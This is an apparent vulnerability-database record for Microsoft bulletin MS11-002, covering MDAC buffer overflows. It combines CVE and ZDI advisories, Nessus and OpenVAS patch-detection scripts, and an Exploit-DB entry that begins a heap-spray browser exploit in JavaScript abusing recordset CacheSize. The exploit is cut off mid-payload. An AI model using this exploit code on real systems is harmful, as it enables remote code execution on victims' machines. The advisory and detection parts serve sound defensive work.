{"cve": [{"lastseen": "2018-11-01T05:13:12", "bulletinFamily": "NVD", "description": "Integer signedness error in the SQLConnectW function in an ODBC API (odbc32.dll) in Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, allows remote attackers to execute arbitrary code via a long string in the Data Source Name (DSN) and a crafted szDSN argument, which bypasses a signed comparison and leads to a buffer overflow, aka \"DSN Overflow Vulnerability.\"", "modified": "2018-10-30T12:27:21", "published": "2011-01-11T20:00:01", "id": "CVE-2011-0026", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0026", "title": "CVE-2011-0026", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-11-01T05:13:12", "bulletinFamily": "NVD", "description": "Microsoft Data Access Components (MDAC) 2.8 SP1 and SP2, and Windows Data Access Components (WDAC) 6.0, does not properly validate memory allocation for internal data structures, which allows remote attackers to execute arbitrary code, possibly via a large CacheSize property that triggers an integer wrap and a buffer overflow, aka \"ADO Record Memory Vulnerability.\" NOTE: this might be a duplicate of CVE-2010-1117 or CVE-2010-1118.", "modified": "2018-10-30T12:27:21", "published": "2011-01-11T20:00:01", "id": "CVE-2011-0027", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2011-0027", "title": "CVE-2011-0027", "type": "cve", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "nessus": [{"lastseen": "2019-01-16T20:11:35", "bulletinFamily": "scanner", "description": "The version of Microsoft Data Access Components (MDAC) installed on\nthe remote Windows host is affected by two vulnerabilities, which\ncould allow arbitrary code execution if a user views a specially\ncrafted web page:\n\n - A buffer overflow in the Open 
Database Connectivity\n (ODBC) API used by third-party applications can be\n triggered by an overly long Data Source Name (DSN)\n argument. (CVE-2011-0026)\n\n - A failure of MDAC to correctly allocate memory when\n handling internal data structures in ActiveX Data\n Objects (ADO) records can be abused to execute\n arbitrary code. (CVE-2011-0027)", "modified": "2018-11-15T00:00:00", "published": "2011-01-11T00:00:00", "id": "SMB_NT_MS11-002.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=51455", "title": "MS11-002: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution (2451910)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(51455);\n script_version(\"1.26\");\n script_cvs_date(\"Date: 2018/11/15 20:50:30\");\n\n script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45695, 45698);\n script_xref(name:\"EDB-ID\", value:\"15984\");\n script_xref(name:\"IAVA\", value:\"2011-A-0004\");\n script_xref(name:\"MSFT\", value:\"MS11-002\");\n script_xref(name:\"MSKB\", value:\"2419640\");\n\n script_name(english:\"MS11-002: Vulnerabilities in Microsoft Data Access Components Could Allow Remote Code Execution (2451910)\");\n script_summary(english:\"Checks the version of Msado15.dll\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"Arbitrary code can be executed on the remote host through Microsoft\nData Access Components.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of Microsoft Data Access Components (MDAC) installed on\nthe remote Windows host is affected by two vulnerabilities, which\ncould allow arbitrary code execution if a user views a specially\ncrafted web page:\n\n - A buffer overflow in the Open Database Connectivity\n (ODBC) API used by third-party applications can be\n triggered by an overly long Data Source Name (DSN)\n argument. 
(CVE-2011-0026)\n\n - A failure of MDAC to correctly allocate memory when\n handling internal data structures in ActiveX Data\n Objects (ADO) records can be abused to execute\n arbitrary code. (CVE-2011-0027)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2011/ms11-002\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-001/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.zerodayinitiative.com/advisories/ZDI-11-002/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Microsoft has released a set of patches for Windows XP, 2003, Vista,\n2008, 7, and 2008 R2.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2011/01/11\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2011/01/11\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2011/01/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2011-2018 Tenable Network Security, Inc.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, 
'Host/patch_management_checks');\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = 'MS11-002';\nkbs = make_list(\"2419640\");\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(xp:'3', win2003:'2', vista:'1,2', win7:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nado_path = hotfix_get_commonfilesdir();\nif (!ado_path) audit(AUDIT_PATH_NOT_DETERMINED, 'Common Files');\nado_path += \"\\system\\ado\";\n\nshare = hotfix_path2share(path:ado_path);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / Server 2008 R2\n # - KB 2419640\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msado15.dll\", version:\"6.1.7600.20818\", min_version:\"6.1.7600.20000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.1\", sp:0, file:\"Msado15.dll\", version:\"6.1.7600.16688\", min_version:\"6.1.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n\n # Vista / Windows Server 2008\n # - KB 2419640\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msado15.dll\", version:\"6.0.6002.22555\", min_version:\"6.0.6002.22000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:2, file:\"Msado15.dll\", version:\"6.0.6002.18362\", min_version:\"6.0.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Msado15.dll\", version:\"6.0.6001.22821\", min_version:\"6.0.6001.22000\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n hotfix_is_vulnerable(os:\"6.0\", sp:1, file:\"Msado15.dll\", version:\"6.0.6001.18570\", 
min_version:\"6.0.0.0\", path:ado_path, bulletin:bulletin, kb:\"2419640\") ||\n\n # Windows 2003 and XP x64\n # - KB 2419635\n hotfix_is_vulnerable(os:\"5.2\", sp:2, file:\"Msado15.dll\", version:\"2.82.4795.0\", path:ado_path, bulletin:bulletin, kb:\"2419635\") ||\n\n # Windows XP\n # - KB 2419632\n hotfix_is_vulnerable(os:\"5.1\", sp:3, arch:\"x86\", file:\"Msado15.dll\", version:\"2.81.3012.0\", path:ado_path, bulletin:bulletin, kb:\"2419632\")\n)\n{\n set_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, 'affected');\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "openvas": [{"lastseen": "2018-02-09T11:14:43", "bulletinFamily": "scanner", "description": "This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.", "modified": "2018-02-08T00:00:00", "published": "2011-01-12T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=902281", "id": "OPENVAS:902281", "title": "Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-002.nasl 8724 2018-02-08 15:02:56Z cfischer $\n#\n# Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# 
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ntag_impact = \"Successful exploitation will allow the attacker to execute arbitrary code on\n the targeted system.\n\n Impact Level: System/Application\";\ntag_affected = \"Microsoft Windows 7\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2K3 Service Pack 2 and prior.\n\n Microsoft Windows Vista Service Pack 2 and prior.\n\n Microsoft Windows Server 2008 Service Pack 2 and prior.\";\ntag_insight = \"The flaws are due to:\n\n - A buffer overflow error in the Data Source Name (DSN) argument of an Open\n Database Connectivity (ODBC) API that may be used by third-party applications,\n which could allow attackers to execute arbitrary code by convincing a user to\n visit a specially crafted web page.\n\n - A memory corruption error in the Microsoft Data Access Components (MDAC) when\n handling internal data structures, which could be exploited by remote attackers\n to execute arbitrary code via a specially crafted web page.\";\ntag_solution = \"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory from the below link,\n\n http://www.microsoft.com/technet/security/Bulletin/MS11-002.mspx\";\ntag_summary = \"This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.\";\n\nif(description)\n{\n script_id(902281);\n script_version(\"$Revision: 8724 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-02-08 16:02:56 +0100 (Thu, 08 Feb 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-12 13:59:47 +0100 (Wed, 12 Jan 2011)\");\n 
script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45698, 45695);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/WindowsVersion\");\n\n script_tag(name : \"impact\" , value : tag_impact);\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419632\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419635\");\n script_xref(name : \"URL\" , value : \"http://support.microsoft.com/kb/2419640\");\n script_xref(name : \"URL\" , value : \"http://www.vupen.com/english/advisories/2011/0075\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\n## Check for OS and Service Pack\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## MS11-002 Hotfix 2419635 2419640 2419632\nif((hotfix_missing(name:\"2419635\") == 0) || (hotfix_missing(name:\"2419640\") == 0) ||\n (hotfix_missing(name:\"2419632\") == 0)){\n exit(0);\n}\n\n## Get Program Files Dir Path and construct complete path\nsysPath =registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\",\n item:\"ProgramFilesDir\");\nif(!sysPath ){\n 
exit(0);\n}\n\ndllPath = sysPath + \"\\Common Files\\System\\msadc\";\nshare = ereg_replace(pattern:\"([a-zA-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[a-zA-Z]:(.*)\", replace:\"\\1\",\n string:dllPath + \"\\Msadco.dll\");\n\n## Get Version from Msadco.dll file\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n exit(0);\n}\n\n## Windows XP\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"2.81.3012.0\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 2003\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"2.82.4795.0\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows Vista and Windows Server 2008\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18570\")){\n security_message(0);\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18362\")){\n security_message(0);\n }\n exit(0);\n }\n security_message(0);\n}\n\n## Windows 7\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n ## Check for Msadco.dll version\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16688\")){\n security_message(0);\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-22T16:44:51", "bulletinFamily": "scanner", "description": "This host is 
missing a critical security update according to\n Microsoft Bulletin MS11-002.", "modified": "2018-10-20T00:00:00", "published": "2011-01-12T00:00:00", "id": "OPENVAS:1361412562310902281", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310902281", "title": "Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: secpod_ms11-002.nasl 11997 2018-10-20 11:59:41Z mmartin $\n#\n# Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\n#\n# Authors:\n# Antu Sanadi <santu@secpod.com>\n#\n# Copyright:\n# Copyright (c) 2011 SecPod, http://www.secpod.com\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.902281\");\n script_version(\"$Revision: 11997 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-10-20 13:59:41 +0200 (Sat, 20 Oct 2018) $\");\n script_tag(name:\"creation_date\", value:\"2011-01-12 13:59:47 +0100 (Wed, 12 Jan 2011)\");\n script_cve_id(\"CVE-2011-0026\", \"CVE-2011-0027\");\n script_bugtraq_id(45698, 45695);\n script_tag(name:\"cvss_base\", value:\"9.3\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_name(\"Microsoft Windows Data Access Components Remote Code Execution Vulnerabilities (2451910)\");\n\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2011 SecPod\");\n script_family(\"Windows : Microsoft Bulletins\");\n script_dependencies(\"secpod_reg_enum.nasl\");\n script_require_ports(139, 445);\n script_mandatory_keys(\"SMB/registry_enumerated\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow the attacker to execute arbitrary code on\n the targeted system.\");\n script_tag(name:\"affected\", value:\"Microsoft Windows 7\n\n Microsoft Windows XP Service Pack 3 and prior.\n\n Microsoft Windows 2K3 Service Pack 2 and prior.\n\n Microsoft Windows Vista Service Pack 2 and prior.\n\n Microsoft Windows Server 2008 Service Pack 2 and prior.\");\n script_tag(name:\"insight\", value:\"The flaws are due to:\n\n - A buffer overflow error in the Data Source Name (DSN) argument of an Open\n Database Connectivity (ODBC) API that may be used by third-party applications,\n which could allow attackers to execute arbitrary code by convincing a user to\n 
visit a specially crafted web page.\n\n - A memory corruption error in the Microsoft Data Access Components (MDAC) when\n handling internal data structures, which could be exploited by remote attackers\n to execute arbitrary code via a specially crafted web page.\");\n script_tag(name:\"solution\", value:\"Run Windows Update and update the listed hotfixes or download and\n update mentioned hotfixes in the advisory\");\n script_tag(name:\"summary\", value:\"This host is missing a critical security update according to\n Microsoft Bulletin MS11-002.\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419632\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419635\");\n script_xref(name:\"URL\", value:\"http://support.microsoft.com/kb/2419640\");\n script_xref(name:\"URL\", value:\"http://www.vupen.com/english/advisories/2011/0075\");\n script_xref(name:\"URL\", value:\"http://www.microsoft.com/technet/security/Bulletin/MS11-002.mspx\");\n exit(0);\n}\n\n\ninclude(\"smb_nt.inc\");\ninclude(\"secpod_reg.inc\");\ninclude(\"version_func.inc\");\ninclude(\"secpod_smb_func.inc\");\n\nif(hotfix_check_sp(xp:4, win2003:3, winVista:3, win2008:3, win7:1) <= 0){\n exit(0);\n}\n\n## MS11-002 Hotfix 2419635 2419640 2419632\nif((hotfix_missing(name:\"2419635\") == 0) || (hotfix_missing(name:\"2419640\") == 0) ||\n (hotfix_missing(name:\"2419632\") == 0)){\n exit(0);\n}\n\nsysPath =registry_get_sz(key:\"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\\",\n item:\"ProgramFilesDir\");\nif(!sysPath ){\n exit(0);\n}\n\ndllPath = sysPath + \"\\Common Files\\System\\msadc\";\nshare = ereg_replace(pattern:\"([a-zA-Z]):.*\", replace:\"\\1$\", string:dllPath);\nfile = ereg_replace(pattern:\"[a-zA-Z]:(.*)\", replace:\"\\1\",\n string:dllPath + \"\\Msadco.dll\");\n\ndllVer = GetVer(file:file, share:share);\nif(!dllVer){\n 
exit(0);\n}\n\nif(hotfix_check_sp(xp:4) > 0)\n{\n SP = get_kb_item(\"SMB/WinXP/ServicePack\");\n if(\"Service Pack 3\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"2.81.3012.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win2003:3) > 0)\n{\n SP = get_kb_item(\"SMB/Win2003/ServicePack\");\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"2.82.4795.0\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(winVista:3, win2008:3) > 0)\n{\n SP = get_kb_item(\"SMB/WinVista/ServicePack\");\n\n if(!SP) {\n SP = get_kb_item(\"SMB/Win2008/ServicePack\");\n }\n\n if(\"Service Pack 1\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6001.18570\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n\n if(\"Service Pack 2\" >< SP)\n {\n if(version_is_less(version:dllVer, test_version:\"6.0.6002.18362\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n exit(0);\n }\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n}\n\nelse if(hotfix_check_sp(win7:1) > 0)\n{\n if(version_is_less(version:dllVer, test_version:\"6.1.7600.16688\")){\n security_message( port: 0, data: \"The target host was found to be vulnerable\" );\n }\n}\n", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "zdi": [{"lastseen": "2016-11-09T00:17:58", "bulletinFamily": "info", "description": "This vulnerability allows attackers to execute arbitrary code on vulnerable installations of Microsoft Data Access Components. 
The vulnerability is present in an API call and as such successful exploitation will depend on an application's implementation of this call.\n\nThe specific flaw exists within the SQLConnectW call in the odbc32.dll component. When calculating the size of a user-provided szDSN, the result of a call to lstrlenW is used in a signed comparison to SQL_MAX_DSN_LENGTH to verify the destination buffer size. This value is later used to copy user-supplied data to a fixed-length stack buffer. A malicious szDSN length could be used to exploit this signedness bug and execute arbitrary code.", "modified": "2011-11-09T00:00:00", "published": "2011-01-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-001", "id": "ZDI-11-001", "title": "Microsoft Data Access Components DSN Overflow Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:05", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. This vulnerability was submitted to the ZDI at the annual Pwn2Own competition at CanSecWest. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe flaw exists within the MSADO component. When handling a user-specified CacheSize property, the process uses this value to calculate the 'real' cache size. This value is used without proper validation. 
A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the browser.", "modified": "2011-11-09T00:00:00", "published": "2011-01-11T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-11-002", "id": "ZDI-11-002", "title": "Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-11-09T00:18:00", "bulletinFamily": "info", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Internet Explorer. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.\n\nThe specific flaw exists within the MSADO component. When handling a user-specified CacheSize property, the process uses this value to calculate the 'real' cache size. This value is used without proper validation. A remote attacker can exploit this vulnerability to execute arbitrary code under the context of the browser. This bug is a failed fix for CVE-2011-0027 / http://www.zerodayinitiative.com/advisories/ZDI-11-002/", "modified": "2012-11-09T00:00:00", "published": "2012-08-22T00:00:00", "href": "http://www.zerodayinitiative.com/advisories/ZDI-12-158", "id": "ZDI-12-158", "title": "Microsoft Internet Explorer MSADO CacheSize Remote Code Execution Vulnerability", "type": "zdi", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "exploitdb": [{"lastseen": "2016-02-01T22:52:30", "bulletinFamily": "exploit", "description": "Microsoft Data Access Components Vulnerability (MS11-002). CVE-2011-0027. 
Remote exploit for windows platform", "modified": "2011-01-12T00:00:00", "published": "2011-01-12T00:00:00", "id": "EDB-ID:15984", "href": "https://www.exploit-db.com/exploits/15984/", "type": "exploitdb", "title": "Microsoft Data Access Components Vulnerability MS11-002", "sourceData": "<html xmlns:t = \"urn:schemas-microsoft-com:time\">\r\n <head>\r\n <meta name=\"License\" content=\"Q Public License;http://en.wikipedia.org/wiki/Q_Public_License\">\r\n <style>\r\n .body {\r\n \r\n }\r\n #test {\r\n \r\n }\r\n </style>\r\n <script src=\"heapLib.js\"></script>\r\n <script>\r\n // This code has been released under the Q Public License by Trolltech\r\n // http://en.wikipedia.org/wiki/Q_Public_License\r\n // Source: http://vreugdenhilresearch.nl/ms11-002-pwn2own-heap-overflow/\r\n\r\n\r\nvar StartTime = new Date(); \r\nvar FinalHeapSpraySize = 900;\r\n//var SmallHoleSize = 0x1F0;\r\nvar SmallHoleSize = 0x240;\r\nvar GlobalRowCounter = 0;\r\n \r\nvar localxmlid1;\r\nvar localxmlid2; \r\nvar localxmlid3; \r\nvar localxmlid5; \r\nvar adobase = 0;\r\nvar finalspray = '';\r\nvar heap = null;\r\nvar ExpoitTime = 10;\r\nvar CurrentHeapSpraySize = 0;\r\n\r\n\r\nfunction Start() {\r\n\tFaseOne();\r\n}\r\n\r\n\r\n\r\nfunction FaseOne() {\r\n\r\n localxmlid1 = document.getElementById('xmlid1').recordset; \r\n localxmlid2 = document.getElementById('xmlid2').recordset; \r\n localxmlid3 = document.getElementById('xmlid3').recordset; \r\n localxmlid5 = document.getElementById('xmlid5').recordset; \r\n \r\n localxmlid2.CacheSize = 0x40000358;\r\n \r\n localxmlid1.CacheSize = SmallHoleSize;; //small hole?\r\n localxmlid1.AddNew([\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\"], [\"c\"]); \r\n localxmlid5.AddNew([\"BBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBBB\"], [\"c\"]); \r\n \r\n \r\n var my1field = localxmlid5.Fields.Item(0);\r\n localxmlid1.MoveFirst();\r\n \r\n 
localxmlid2.AddNew([\"BBBB\"], [\"c\"]); \r\n \r\n localxmlid1.Close();\r\n CollectGarbage();\r\n \r\n localxmlid3.MoveFirst();\r\n \r\n void(Math.atan2(0xbabe, ('###################### 2 Move First').toString()));\r\n localxmlid2.MoveFirst();\r\n\r\n void(Math.atan2(0xbabe, ('###################### 5 Move First').toString()));\r\n localxmlid5.CacheSize = 0x40000008;\r\n localxmlid5.MoveFirst();\r\n localxmlid3.AddNew([\"MyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyDataField1MustBeLongMyD